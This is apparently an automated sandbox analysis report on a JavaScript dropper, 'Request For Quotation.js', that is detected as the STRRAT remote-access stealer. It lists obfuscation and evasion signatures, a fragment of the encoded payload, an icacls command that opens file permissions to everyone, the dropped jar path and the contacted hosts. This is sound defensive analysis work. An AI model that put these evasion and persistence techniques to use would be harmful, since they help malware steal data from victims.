Source: Yara match File source: 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: Request For Quotation.js String : entropy: 5.53, length: 213714, content: 'dmFyIG5lbTQ0Ow0{1}dmFyIGxvbmd{0}ZXh0I{2}0gIlVFc0RCQlE8JTx{2}PC{0}8Z0k8JTx{2}cTh0MWc8JTw8JTw8JTw8JTw Go to definition
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09CCA push es; retf 0034h 2_3_14D09CD3
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09CCA push es; retf 0034h 2_3_14D09CD3
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A080 push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A080 push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A05D push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A05D push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09647 push edx; iretd 2_3_14D096AB
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09647 push edx; iretd 2_3_14D096AB
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D033E5 push cs; ret 2_3_14D033E6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A54B push es; retn 0059h 2_3_14D0A60B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A54B push es; retn 0059h 2_3_14D0A60B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0CF37 push eax; iretd 2_3_14D0CF49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0CF37 push eax; iretd 2_3_14D0CF49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09CCA push es; retf 0034h 2_3_14D09CD3
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09CCA push es; retf 0034h 2_3_14D09CD3
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A080 push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A080 push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A05D push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A05D push es; retn 0045h 2_3_14D0A10B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09647 push edx; iretd 2_3_14D096AB
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D09647 push edx; iretd 2_3_14D096AB
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D033E5 push cs; ret 2_3_14D033E6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A54B push es; retn 0059h 2_3_14D0A60B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0A54B push es; retn 0059h 2_3_14D0A60B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0CF37 push eax; iretd 2_3_14D0CF49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_14D0CF37 push eax; iretd 2_3_14D0CF49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247D8F7 push 00000000h; mov dword ptr [esp], esp 2_2_0247D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247A20A push ecx; ret 2_2_0247A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247A21B push ecx; ret 2_2_0247A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247BB67 push 00000000h; mov dword ptr [esp], esp 2_2_0247BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_0247B3B7 push 00000000h; mov dword ptr [esp], esp 2_2_0247B3DD
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000002.00000002.3323308620.00000000009F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000002.00000002.3323308620.00000000009F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000002.00000003.2063090050.0000000014A6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000002.00000002.3323308620.00000000009F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\otyhtiklwj.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_024703C0 cpuid 2_2_024703C0
Queries the installed Java version
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7100 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\3608lock.file VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected STRRAT
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected STRRAT
Source: Yara match File source: 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526387 Sample: Request For Quotation.js Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 22 repo1.maven.org 2->22 24 github.com 2->24 26 dualstack.sonatype.map.fastly.net 2->26 34 Multi AV Scanner detection for domain / URL 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 5 other signatures 2->40 9 wscript.exe 1 2 2->9         started        signatures3 process4 file5 20 C:\Users\user\AppData\...\otyhtiklwj.txt, Zip 9->20 dropped 42 JScript performs obfuscated calls to suspicious functions 9->42 44 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->44 13 javaw.exe 23 9->13         started        signatures6 process7 dnsIp8 28 140.82.121.3, 443, 49857, 49895 GITHUBUS United States 13->28 30 github.com 140.82.121.4, 443, 49707, 49711 GITHUBUS United States 13->30 32 2 other IPs or domains 13->32 16 icacls.exe 1 13->16         started        process9 process10 18 conhost.exe 16->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
199.232.192.209
 dualstack.sonatype.map.fastly.net United States
54113 FASTLYUS false
140.82.121.3
 unknown United States
36459 GITHUBUS false
140.82.121.4
 github.com United States
36459 GITHUBUS false
199.232.196.209
 unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
github.com 140.82.121.4 true
dualstack.sonatype.map.fastly.net 199.232.192.209 true
repo1.maven.org unknown unknown